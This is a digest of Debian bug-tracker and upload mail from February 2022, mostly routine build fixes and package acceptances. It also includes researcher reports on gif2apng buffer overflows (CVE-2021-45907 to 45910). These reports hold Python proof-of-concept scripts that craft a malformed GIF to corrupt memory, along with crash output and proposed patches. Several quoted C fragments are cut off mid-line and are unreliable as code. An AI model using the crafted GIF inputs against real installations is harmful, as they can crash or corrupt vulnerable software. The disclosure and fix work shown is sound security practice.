Bug#1005109: ipod-time-sync: error while loading shared libraries: libsgutils2-1.45.so.2: cannot open shared object file: No such file or directory
Package: libgpod-common Version: 0.8.3-16 Severity: important Dear Maintainer, % ipod-time-sync /dev/sdd ipod-time-sync: error while loading shared libraries: libsgutils2-1.45.so.2: cannot open shared object file: No such file or directory zsh: exit 127 ipod-time-sync /dev/sdd % ldd =ipod-time-sync linux-vdso.so.1 (0x7ffde4785000) libsgutils2-1.45.so.2 => not found ... -- System Information: Debian Release: bookworm/sid APT prefers unstable APT policy: (800, 'unstable'), (200, 'experimental') Architecture: amd64 (x86_64) Versions of packages libgpod-common depends on: ii libc6 2.33-5 ii libglib2.0-0 2.70.3-1 ii libgpod4 0.8.3-16 ii libimobiledevice6 1.3.0-6 ii libplist3 2.2.0-6 ii libsgutils2-2 1.46-1 ii libusb-1.0-0 2:1.0.25-1 ii libxml22.9.12+dfsg-5+b1
Processing of gthumb_3.12.0-2_source.changes
gthumb_3.12.0-2_source.changes uploaded successfully to localhost along with the files: gthumb_3.12.0-2.dsc gthumb_3.12.0-2.debian.tar.xz gthumb_3.12.0-2_source.buildinfo Greetings, Your Debian queue daemon (running on host usper.debian.org)
gthumb_3.12.0-2_source.changes ACCEPTED into unstable
Accepted: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Mon, 07 Feb 2022 10:39:44 -0500 Source: gthumb Built-For-Profiles: noudeb Architecture: source Version: 3:3.12.0-2 Distribution: unstable Urgency: medium Maintainer: Debian QA Group Changed-By: Jeremy Bicha Changes: gthumb (3:3.12.0-2) unstable; urgency=medium . * QA upload. * Cherry-pick patch to fix build with latest meson * Use debian/gthumb.docs to install NEWS Checksums-Sha1: 1a2837b313d2e0a45c8cf85bb89ab8cd26b51ff6 2332 gthumb_3.12.0-2.dsc 8bc49e719cc99872c6b2195433723edbf47b9d0e 32996 gthumb_3.12.0-2.debian.tar.xz 1a86ae9263e84b6d953732f204cfe2325b78da41 6173 gthumb_3.12.0-2_source.buildinfo Checksums-Sha256: cc563b6917801a760d62f4aba0a359a646a041c62ef8aaa390afbee2848f2f34 2332 gthumb_3.12.0-2.dsc b6bc672ece44c158774e668680c5f73968c7a7abd9db5b6778ee07d583d4a9ef 32996 gthumb_3.12.0-2.debian.tar.xz 7bde190708bf33b0f6c96bf9170d31b7eeca551f79eeaa0dd8132849b2e2de53 6173 gthumb_3.12.0-2_source.buildinfo Files: 5be1294581c4b2abc194f670bdae561f 2332 gnome optional gthumb_3.12.0-2.dsc b422e8afa09dd4a27b2f96260e04da48 32996 gnome optional gthumb_3.12.0-2.debian.tar.xz 4ce65d2c208b52f127d012b5b1c5d830 6173 gnome optional gthumb_3.12.0-2_source.buildinfo -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEETQvhLw5HdtiqzpaW5mx3Wuv+bH0FAmIBPX0ACgkQ5mx3Wuv+ bH3fYw/+Lg5dJJAC0RBGF38Yp+ln/E7a9HxAeY3DStEZb1HOiUq4zO5s5yujxpVJ jaWBLobTBinuqjonuiD7rLEWDq1VTJfz92Cr0cnDJonlGYQYWAsHtU6Vim5fvJzS +lHzHM9fHQqsELHbI1B1d8CtBFAeL3EYnlKkIjkNzt2nXh0OZozPbn/Myt6EnJlo ok7XHp2g3uVWNTHyAR8QIDPnqHN8MsJwG44YJoDFQ8ijJr/ELbPD6S06Ii3eUa/J LaKayZV2wgiisV/EJgb5PLRLi/7zicB5Hiw2H5bXHSjLE27PVgFLFphXXqnMXt1j peFdJ/hQCXOEkhlYbe0l9v8svU/6MG+8wjdqJ0XlJLbUkegsQxdezftyREacctKI M01lfiQXzLm+ECw1msgqsymPfdalzwyukFs/+UtEAW2hwynxwp8Qbqoqsjzjw38Q +OZT/urM/YqWrXEIyJwJBf95Jovoc42cS9AKjrvUjI7myYSnZbnzwP6zlZkqpR0z FrTShedVd0JcMTF3Uy3R8ueWpfBsspygJoY/HSWV26yAU803+uA9VEGIDYnBvUfN Hv9R++spXuhbJ6RAvY24sDMKrTqHztIBBFLV9FIpMnRKaKQDX+PmWi01ORk7eo8V 8SbfMaJjzuoN4hbNIP2FiZ2gEkyAElTtfiavlKQqYXZFcw+v91E= =scyf -END PGP SIGNATURE- Thank you for your contribution to Debian.
Bug#1005138: delta FTBFS with DEB_BUILD_OPTIONS=nocheck
Source: delta Version: 2006.08.03-10 Severity: important Tags: ftbfs patch X-Debbugs-Cc: Joao Eriberto Mota Filho User: debian-cr...@lists.debian.org Usertags: ftcbfs delta fails to build from source when DEB_BUILD_OPTIONS contains nocheck. In that case, the execute_before_dh_auto_test is skipped and it makes dh_install fail finding singledelta. Given that m68k and sh4 add nocheck by default, it explains why they ftbfs on buillds. Please consider applying the attached patch. Helmut diff --minimal -Nru delta-2006.08.03/debian/changelog delta-2006.08.03/debian/changelog --- delta-2006.08.03/debian/changelog 2022-02-03 02:01:34.0 +0100 +++ delta-2006.08.03/debian/changelog 2022-02-07 20:22:26.0 +0100 @@ -1,3 +1,10 @@ +delta (2006.08.03-11) UNRELEASED; urgency=medium + + * QA upload. + * Fix FTBFS with DEB_BUILD_OPTIONS=nocheck. (Closes: #-1) + + -- Helmut Grohne Mon, 07 Feb 2022 20:22:26 +0100 + delta (2006.08.03-10) unstable; urgency=medium * QA upload. diff --minimal -Nru delta-2006.08.03/debian/rules delta-2006.08.03/debian/rules --- delta-2006.08.03/debian/rules 2022-02-03 02:01:34.0 +0100 +++ delta-2006.08.03/debian/rules 2022-02-07 20:22:25.0 +0100 @@ -11,6 +11,4 @@ for i in $$(ls debian/manpage/*.pod | cut -d'.' -f1); do \ pod2man -c '' -r 'Delta 2006.08.03' $$i.pod > $$i.1; \ done - -execute_before_dh_auto_test: cp delta singledelta
Bug#1005138: delta FTBFS with DEB_BUILD_OPTIONS=nocheck
Hi Helmut, Thanks a lot for your help. Cheers, Eriberto
Bug#1005138: marked as done (delta FTBFS with DEB_BUILD_OPTIONS=nocheck)
Your message dated Mon, 07 Feb 2022 20:48:32 + with message-id and subject line Bug#1005138: fixed in delta 2006.08.03-11 has caused the Debian Bug report #1005138, regarding delta FTBFS with DEB_BUILD_OPTIONS=nocheck to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1005138: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005138 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: delta Version: 2006.08.03-10 Severity: important Tags: ftbfs patch X-Debbugs-Cc: Joao Eriberto Mota Filho User: debian-cr...@lists.debian.org Usertags: ftcbfs delta fails to build from source when DEB_BUILD_OPTIONS contains nocheck. In that case, the execute_before_dh_auto_test is skipped and it makes dh_install fail finding singledelta. Given that m68k and sh4 add nocheck by default, it explains why they ftbfs on buillds. Please consider applying the attached patch. Helmut diff --minimal -Nru delta-2006.08.03/debian/changelog delta-2006.08.03/debian/changelog --- delta-2006.08.03/debian/changelog 2022-02-03 02:01:34.0 +0100 +++ delta-2006.08.03/debian/changelog 2022-02-07 20:22:26.0 +0100 @@ -1,3 +1,10 @@ +delta (2006.08.03-11) UNRELEASED; urgency=medium + + * QA upload. + * Fix FTBFS with DEB_BUILD_OPTIONS=nocheck. (Closes: #-1) + + -- Helmut Grohne Mon, 07 Feb 2022 20:22:26 +0100 + delta (2006.08.03-10) unstable; urgency=medium * QA upload. diff --minimal -Nru delta-2006.08.03/debian/rules delta-2006.08.03/debian/rules --- delta-2006.08.03/debian/rules 2022-02-03 02:01:34.0 +0100 +++ delta-2006.08.03/debian/rules 2022-02-07 20:22:25.0 +0100 @@ -11,6 +11,4 @@ for i in $$(ls debian/manpage/*.pod | cut -d'.' -f1); do \ pod2man -c '' -r 'Delta 2006.08.03' $$i.pod > $$i.1; \ done - -execute_before_dh_auto_test: cp delta singledelta --- End Message --- --- Begin Message --- Source: delta Source-Version: 2006.08.03-11 Done: Joao Eriberto Mota Filho We believe that the bug you reported is fixed in the latest version of delta, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1005...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Joao Eriberto Mota Filho (supplier of updated delta package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Mon, 07 Feb 2022 16:41:42 -0300 Source: delta Architecture: source Version: 2006.08.03-11 Distribution: unstable Urgency: medium Maintainer: Debian QA Group Changed-By: Joao Eriberto Mota Filho Closes: 1005138 Changes: delta (2006.08.03-11) unstable; urgency=medium . * QA upload. * debian/rules: dropped execute_before_dh_auto_test, moving its content to override_dh_auto_build. This action will fix a FTBFS with DEB_BUILD_OPTIONS=nocheck. Thanks to Helmut Grohne . (Closes: #1005138) * debian/watch: added a fake site to explain about the current status of the original upstream homepage. Checksums-Sha1: 50cd89990f22d9080bfcf0a6f51d873798f45d8c 1887 delta_2006.08.03-11.dsc e5f6bc4b6f20d62330558f57a3c099587e859522 7148 delta_2006.08.03-11.debian.tar.xz 98cb62cb7d753015a4a0e91f376c7795f5bce9ef 5578 delta_2006.08.03-11_source.buildinfo Checksums-Sha256: 0fac9a69dc27e1f0f5bf58abd074d004375af81a7a517928dc20f3ad4e58c38b 1887 delta_2006.08.03-11.dsc 4e28952f66d6a4ab6965c6656d259842649bbc11be8af7c05dd3495a939df420 7148 delta_2006.08.03-11.debian.tar.xz ff7ee7a94e6567f0e0c9367894394823422a439ecc02a87319c14278110caaec 5578 delta_2006.08.03-11_source.buildinfo Files: e5206ac2d03f8b33444b42bbb0ecab9c 1887 devel optional delta_2006.08.03-11.dsc ae3c33c08506ecacf6061765c6079b86 7148 devel optional delta_2006.08.03-11.debian.tar.xz c12155971718729ebb0cd1771e982010 5578 devel optional delta_2006.08.03-11_source.buildinfo -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEENX3LDuyVoBrrofDS3mO5xwTr6e8FAmIBf9sACgkQ3mO5xwTr 6e8+xQ/8DmO8e2PcJ0eXApdwY5RxOwNYPKqHMIbELvn3sKHnwDJpJjcRg3EB7yl2 ryHy8g/J42LgWpWqBwnmkXqDVXQ+u4LuT50RA1PIVvyu+EyGDyaYn9+/BJQrhG14 lDEiRCwHrnFzwUAB3/IPmBEEQy+DxUN4pnH1PtFqJu+YAZfiAE/io1lOaGkt4ZAP bj5y9XweYeALjIMdwSCpimYlsbPYqEM4XSdrqVbMviXPjmO4On4Qa7J8
Processing of delta_2006.08.03-11_source.changes
delta_2006.08.03-11_source.changes uploaded successfully to localhost along with the files: delta_2006.08.03-11.dsc delta_2006.08.03-11.debian.tar.xz delta_2006.08.03-11_source.buildinfo Greetings, Your Debian queue daemon (running on host usper.debian.org)
delta_2006.08.03-11_source.changes ACCEPTED into unstable
Accepted: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Mon, 07 Feb 2022 16:41:42 -0300 Source: delta Architecture: source Version: 2006.08.03-11 Distribution: unstable Urgency: medium Maintainer: Debian QA Group Changed-By: Joao Eriberto Mota Filho Closes: 1005138 Changes: delta (2006.08.03-11) unstable; urgency=medium . * QA upload. * debian/rules: dropped execute_before_dh_auto_test, moving its content to override_dh_auto_build. This action will fix a FTBFS with DEB_BUILD_OPTIONS=nocheck. Thanks to Helmut Grohne . (Closes: #1005138) * debian/watch: added a fake site to explain about the current status of the original upstream homepage. Checksums-Sha1: 50cd89990f22d9080bfcf0a6f51d873798f45d8c 1887 delta_2006.08.03-11.dsc e5f6bc4b6f20d62330558f57a3c099587e859522 7148 delta_2006.08.03-11.debian.tar.xz 98cb62cb7d753015a4a0e91f376c7795f5bce9ef 5578 delta_2006.08.03-11_source.buildinfo Checksums-Sha256: 0fac9a69dc27e1f0f5bf58abd074d004375af81a7a517928dc20f3ad4e58c38b 1887 delta_2006.08.03-11.dsc 4e28952f66d6a4ab6965c6656d259842649bbc11be8af7c05dd3495a939df420 7148 delta_2006.08.03-11.debian.tar.xz ff7ee7a94e6567f0e0c9367894394823422a439ecc02a87319c14278110caaec 5578 delta_2006.08.03-11_source.buildinfo Files: e5206ac2d03f8b33444b42bbb0ecab9c 1887 devel optional delta_2006.08.03-11.dsc ae3c33c08506ecacf6061765c6079b86 7148 devel optional delta_2006.08.03-11.debian.tar.xz c12155971718729ebb0cd1771e982010 5578 devel optional delta_2006.08.03-11_source.buildinfo -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEENX3LDuyVoBrrofDS3mO5xwTr6e8FAmIBf9sACgkQ3mO5xwTr 6e8+xQ/8DmO8e2PcJ0eXApdwY5RxOwNYPKqHMIbELvn3sKHnwDJpJjcRg3EB7yl2 ryHy8g/J42LgWpWqBwnmkXqDVXQ+u4LuT50RA1PIVvyu+EyGDyaYn9+/BJQrhG14 lDEiRCwHrnFzwUAB3/IPmBEEQy+DxUN4pnH1PtFqJu+YAZfiAE/io1lOaGkt4ZAP bj5y9XweYeALjIMdwSCpimYlsbPYqEM4XSdrqVbMviXPjmO4On4Qa7J86mW0gLvT e5LdmRYF6zL785t2xLdVeZ5RFrI1J4I3UzJPXg8WHjzp6Zbzpri2ko7KT9+8NRsx 84xeu8eUhxpmT4qLr5oToT98SjU8hmLPB8GUbt0ke5MBNfm07c5+AThTU+OU9wq8 pMVOnCt4YrCV0boAwZQWv5BfTdNOUogot4vap4mhgSTx2kNcoGXToHmR+9ObmVIm yCBROqybwcXFoBb4sfK4d/RUcFnBQ9rxqpGysLdLaV4UvLwlyKj7eI06uT5JGl2s ekxLuIn/WvtSwUqAiqSQh2DNFio051ah7Eh7H/3oi4QIL/kNIyAtPu0+G4C+cI/6 b3n2N9AZ50Lje1nUhkHwwfRR6pLkMgDP4IrQ+vNagRyVcOtZMIEGj2HIFhJoHIff UeH0qdFvtISxwFFJ7ommWMhmyTrTCPJrfeDHl44p7Dn3DKEzSrA= =vPmV -END PGP SIGNATURE- Thank you for your contribution to Debian.
Bug#1002621: marked as done (gif2apng: Stack based overflow in the handling of input and output file name)
Your message dated Mon, 07 Feb 2022 21:43:10 +
with message-id
and subject line Bug#1004933: Removed package(s) from unstable
has caused the Debian Bug report #1002621,
regarding gif2apng: Stack based overflow in the handling of input and output
file name
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
1002621: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002621
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Dear Maintainer,
I found a stack based overflow in the handling of the command line arguments in
the gif2apng package.
The responsible code looks as follows:
gif2apng.cpp (line 421-518):
int main(int argc, char** argv)
{
[...]
char szIn[256];
char szOut[256];
[...]
szIn[0] = 0;
szOut[0] = 0;
for (i=1; i strncpy
else
if (szOut[0] == 0)
strncpy(szOut, szOpt, 255); // strcpy -> strncpy
}
szIn[255] = 0; // Ensure, that the string is terminated with a zero byte
szOut[255] = 0;
if (deflate_method == 0)
printf(" using ZLIB\n\n");
else if (deflate_method == 1)
printf(" using 7ZIP with %d iterations\n\n", iter);
else if (deflate_method == 2)
printf(" using ZOPFLI with %d iterations\n\n", iter);
if (szOut[0] == 0)
{
strncpy(szOut, szIn, 251); // Ensure, that with .png appended the string
still fits into the buffer
if ((szExt = strrchr(szOut, '.')) != NULL) *szExt = 0;
strcat(szOut, ".png");
}
[...]
I was able to compile the code with these changes and the issue seemed to be
fixed.
Best regards
Kolja
-- System Information:
Debian Release: 10.11
APT prefers oldstable-updates
APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8),
LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages gif2apng depends on:
ii libc6 2.28-10
ii libzopfli1 1.0.2-1
ii zlib1g 1:1.2.11.dfsg-1
gif2apng recommends no packages.
Versions of packages gif2apng suggests:
pn apng2gif
-- no debconf information
--- End Message ---
--- Begin Message ---
Version: 1.9+srconly-3+rm
Dear submitter,
as the package gif2apng has just been removed from the Debian archive
unstable we hereby close the associated bug reports. We are sorry
that we couldn't deal with your issue properly.
For details on the removal, please see https://bugs.debian.org/1004933
The version of this package that was in Debian prior to this removal
can still be found using http://snapshot.debian.org/.
Please note that the changes have been done on the master archive and
will not propagate to any mirrors until the next dinstall run at the
earliest.
This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
ftpmas...@ftp-master.debian.org.
Debian distribution maintenance software
pp.
Scott Kitterman (the ftpmaster behind the curtain)--- End Message ---
Bug#1002667: marked as done (gif2apng: CVE-2021-45910: Heap based buffer overflow in the main function)
Your message dated Mon, 07 Feb 2022 21:43:10 +
with message-id
and subject line Bug#1004933: Removed package(s) from unstable
has caused the Debian Bug report #1002667,
regarding gif2apng: CVE-2021-45910: Heap based buffer overflow in the main
function
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
1002667: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002667
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security
Dear Maintainer,
I found a heap overflow in the main function of the gif2apng application. The
issue exists within the for loops in the following code from the main function
in gif2apng.cpp:
if (coltype == 2)
{
for (j=0; jh2) ? (j-h2)*2-1 : (j>h2/2) ?
(j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8;
src = buffer + j*w0;
dst = frame0 + ((k+y0)*w + x0)*3;
for (i=0; ih2) ? (j-h2)*2-1 : (j>h2/2) ?
(j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8;
src = buffer + j*w0;
dst = frame0 + (k+y0)*w + x0;
if (shuffle)
{
for (i=0; ih2) ? (j-h2)*2-1 : (j>h2/2) ?
(j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8;
src = buffer + j*w0;
dst = frame0 + ((k+y0)*w + x0)*3;
if ( ( (j*w0 + w0) > buffer_size) || ( k+y0)*w + x0)*3) + w0
* 3 ) > imagesize) || k+y0)*w + x0)*3) < 0 ) || ( (j*w0) < 0)) {
printf("Something is wrong with the size values\n");
exit(0);
}
for (i=0; ih2) ? (j-h2)*2-1 : (j>h2/2) ?
(j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8;
src = buffer + j*w0;
dst = frame0 + (k+y0)*w + x0;
if ( ( (j*w0 + w0) > buffer_size) || ( (((k+y0)*w + x0) + w0 ) >
imagesize) || k+y0)*w + x0)) < 0 ) || ( (j*w0) < 0)) {
printf("Something is wrong with the size values\n");
exit(0);
}
if (shuffle)
{
for (i=0; i
-- no debconf information
--- End Message ---
--- Begin Message ---
Version: 1.9+srconly-3+rm
Dear submitter,
as the package gif2apng has just been removed from the Debian archive
unstable we hereby close the associated bug reports. We are sorry
that we couldn't deal with your issue properly.
For details on the removal, please see https://bugs.debian.org/1004933
The version of this package that was in Debian prior to this removal
can still be found using http://snapshot.debian.org/.
Please note that the changes have been done on the master archive and
will not propagate to any mirrors until the next dinstall run at the
earliest.
This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
ftpmas...@ftp-master.debian.org.
Debian distribution maintenance software
pp.
Scott Kitterman (the ftpmaster behind the curtain)--- End Message ---
Bug#1002669: marked as done (gif2apng: CVE-2021-45907 CVE-2021-45908: Two stack based buffer overflows in the DecodeLZW function)
Your message dated Mon, 07 Feb 2022 21:43:10 +
with message-id
and subject line Bug#1004933: Removed package(s) from unstable
has caused the Debian Bug report #1002669,
regarding gif2apng: CVE-2021-45907 CVE-2021-45908: Two stack based buffer
overflows in the DecodeLZW function
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
1002669: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002669
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: gif2apng
Version: 1.9+srconly-3
Severity: normal
Tags: security
Dear Maintainer,
There are two stack based buffer overflows in the gif2apng application. The
responsible code is located in the DecodeLZW function and looks as follows:
void DecodeLZW(unsigned char * img, unsigned int img_size, FILE * f1) // added
parameter img_size
{
int i, bits, codesize, codemask, clearcode, nextcode, lastcode;
unsigned int j;
unsigned int size = 0;
unsigned int accum = 0;
unsigned short prefix[4097];
unsigned char suffix[4097];
unsigned char str[4097];
unsigned char data[1024];
unsigned char firstchar = 0;
unsigned char *pstr = str;
unsigned char *pout = img;
unsigned char mincodesize;
if (fread(&mincodesize, 1, 1, f1) != 1) return;
bits = 0;
codesize = mincodesize + 1;
codemask = (1 << codesize) - 1;
clearcode = 1 << mincodesize;
nextcode = clearcode + 2;
lastcode = -1;
for (i=0; i= clearcode)
{
*pstr++ = suffix[code];
code = prefix[code];
}
In both loops at the end it is possible to write over the boundaries of the
buffer by providing certain values a part of the gif file. For the for loop we
can provide a large value for mincodesize leading to a clearcode bigger than
4097 and therefore overflowing the buffer. In the while loop we can provide
code values, that repeat so that prefix[code] results in the same code again.
I wrote the following script to generate a poc.gif file:
#!/bin/python3
# Writing to poc.gif
f = open("poc.gif", "wb")
# Data needed to enter the code path:
beginning = b"GIF87a" + b"\x10\x00\x10\x00" + b"\x01" * 3 + b"\x2c" + b"\x01" *
9
f.write(beginning)
mincode = b"\x07"
# Uncomment the following line to trigger the other crash
# mincode = b"\x10"
f.write(mincode)
# Size value and byte we write to the heap
target_char = b"\x01" + b"\xff\xfe"*1
f.write(target_char)
f.close()
The poc.gif file generated by the script does trigger the overflow in the while
loop. If the other value for mincode is used it should trigger the overflow in
the for loop. Using the poc.gif file as follows led to a segmentation fault:
$ gif2apng -i0 poc.gif /dev/null
gif2apng 1.9 using ZLIB
Reading 'poc.gif'...
Speicherzugriffsfehler
As I see no way to control the data, that is written in the loops I do not
think, that this can necessarily exploited to gain code execution.
I fixed the issue locally by introducing a variable, that keeps track of the
amount of data written to the pstr pointer and by doing some boundary checks
before writing to the buffers:
if (clearcode > 4097) { // Added to avoid stack overflow here
printf("Invalid Image\n");
exit(0);
}
for (i=0; i= nextcode)
{
if ( write_counter <= 4097) { // Added to fix stack overflow here
*pstr++ = firstchar;
write_counter++;
code = lastcode;
}
else {
printf("Invalid Image\n");
exit(0);
}
}
while (code >= clearcode)
{
if ( write_counter <= 4097) { // Added to fix stack overflow here
*pstr++ = suffix[code];
write_counter++;
code = prefix[code];
}
else {
printf("Invalid Image\n");
exit(0);
}
}
if ( write_counter <= 4097) { // Added to fix stack overflow here
*pstr++ = firstchar = suffix[code];
write_counter++;
}
else {
printf("Invalid Image\n");
exit(0);
}
This seemed to fix the issue for me locally, but it could use some more testing.
Best regards
Kolja
-- System Information:
Debian Release: 10.11
APT prefers oldstable-updates
APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8),
LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
In
Bug#1002668: marked as done (gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW function)
Your message dated Mon, 07 Feb 2022 21:43:10 +
with message-id
and subject line Bug#1004933: Removed package(s) from unstable
has caused the Debian Bug report #1002668,
regarding gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW
function
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
1002668: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002668
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security
Dear Maintainer,
There is a heap based buffer overflow in the gif2apng package. The
vulnerability is located in the DecodeLZW function in the gif2apng.cpp file.
The problem here is, that this function writes to a buffer, that was allocated
using malloc without checking the size of this buffer. Therefore it is possible
to provide a gif to the program, that contains more data than fits into this
buffer leading to a memory corruption on the heap. I wrote the following poc
script in python:
#!/bin/python3
# Writing to poc.gif
f = open("poc.gif", "wb")
# Data needed to enter the code path:
beginning = b"GIF87a" + b"\x10\x00\x10\x00" + b"\x01" * 3 + b"\x2c" + b"\x01" *
9
f.write(beginning)
# Value needed in the vulnerable function
mincode = b"\x07"
f.write(mincode)
for i in range(0,1):
# Size value and byte we write to the heap
target_char = b"\x01" + b"A"
f.write(target_char)
# Resetting the values using "clearcode" to keep the code path as simple
as possible
clear_code = b"\x01" + b"\x80"
f.write(clear_code)
f.close()
This script creates a file called poc.gif, which writes 1 "A"'s into a
buffer of size 512 leading to memory corruption on the heap. I tested this on
Debian 10 using the current version of the package from the testing repository
and got the following output:
$ gif2apng -i0 poc.gif /dev/null
gif2apng 1.9 using ZLIB
Reading 'poc.gif'...
1 frames.
malloc(): corrupted top size
Abgebrochen
This vulnerability seems to allow a write of an arbitrary number of arbitrary
bytes. Therefore I think it likely, that this could be exploited.
To fix this issue locally I added a buffer_size variable to the main function,
which holds the size of the allocated buffer (the imagesize value used
initially for the allocation was overwritten at some point). I then passed this
value to the DecodeLZW function and added two if-statements around the writes
to the the buffer to check whether the buffer can hold more bytes. My code
looks as follows:
void DecodeLZW(unsigned char * img, unsigned int img_size, FILE * f1) // added
parameter img_size
{
unsigned int bytes_written = 0;
[...]
if (lastcode == -1)
{
if (bytes_written < img_size) { // Added if-statement
*pout++ = suffix[code];
bytes_written++;
}
else {
printf("Invalid image size\n");
exit(0);
}
firstchar = lastcode = code;
continue;
}
[...]
do
{
if (bytes_written < img_size) { // Added if-statement
*pout++ = *--pstr;
bytes_written++;
}
else {
printf("Invalid image size\n");
exit(0);
}
}
while (pstr > str);
[...]
int main(int argc, char** argv)
{
unsigned int buffer_size = 0; // New variable to hold the size of the
buffer
[...]
grayscale = 1;
buffer_size = imagesize*2; // New variable, as imagesize is overwritten
at some point
buffer = (unsigned char *)malloc(buffer_size);
if (buffer == NULL)
{
printf("Error: not enough memory\n");
return 1;
}
[...]
DecodeLZW(buffer, buffer_size, f1); // Added buffer_size
[...]
DecodeLZW(buffer, buffer_size, f1); // Added Buffer size
[...]
This compiled successfully and fixed the buffer overflow for me. I am however
not sure if this is the cleanest way to fix the issue and it could use some
more testing.
Best regards
Kolja
-- System Information:
Debian Release: 10.11
APT prefers oldstable-updates
APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8),
LANGUAGE=de_DE.UTF-8 (c
Bug#932931: marked as done (gif2apng FTCBFS: uses the build architecture compiler)
Your message dated Mon, 07 Feb 2022 21:43:10 + with message-id and subject line Bug#1004933: Removed package(s) from unstable has caused the Debian Bug report #932931, regarding gif2apng FTCBFS: uses the build architecture compiler to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 932931: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=932931 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: gif2apng Version: 1.9+srconly-3 Tags: patch User: debian-cr...@lists.debian.org Usertags: ftcbfs gif2apng fails to cross build from source, because debian/rules uses the build architecture compiler as a make default. Supplying the value from dpkg's buildtools.mk is an easy way to fix that. Please consider applying the attached patch. Helmut diff --minimal -Nru gif2apng-1.9+srconly/debian/changelog gif2apng-1.9+srconly/debian/changelog --- gif2apng-1.9+srconly/debian/changelog 2019-07-19 21:33:19.0 +0200 +++ gif2apng-1.9+srconly/debian/changelog 2019-07-24 22:16:47.0 +0200 @@ -1,3 +1,9 @@ +gif2apng (1.9+srconly-4) UNRELEASED; urgency=medium + + * Fix FTCBFS: Let dpkg's buildtools.mk supply CC. (Closes: #-1) + + -- 